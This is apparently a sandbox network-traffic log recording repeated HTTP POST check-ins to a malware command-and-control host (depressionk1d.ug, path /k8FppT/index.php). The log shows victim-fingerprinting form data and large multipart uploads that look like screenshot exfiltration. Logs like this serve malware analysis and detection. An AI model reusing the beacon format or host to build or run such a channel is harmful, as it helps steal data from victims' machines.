              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----66fb56215c6a9fc0af8f0f17b5d10c80Host: depressionk1d.ugContent-Length: 107062Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
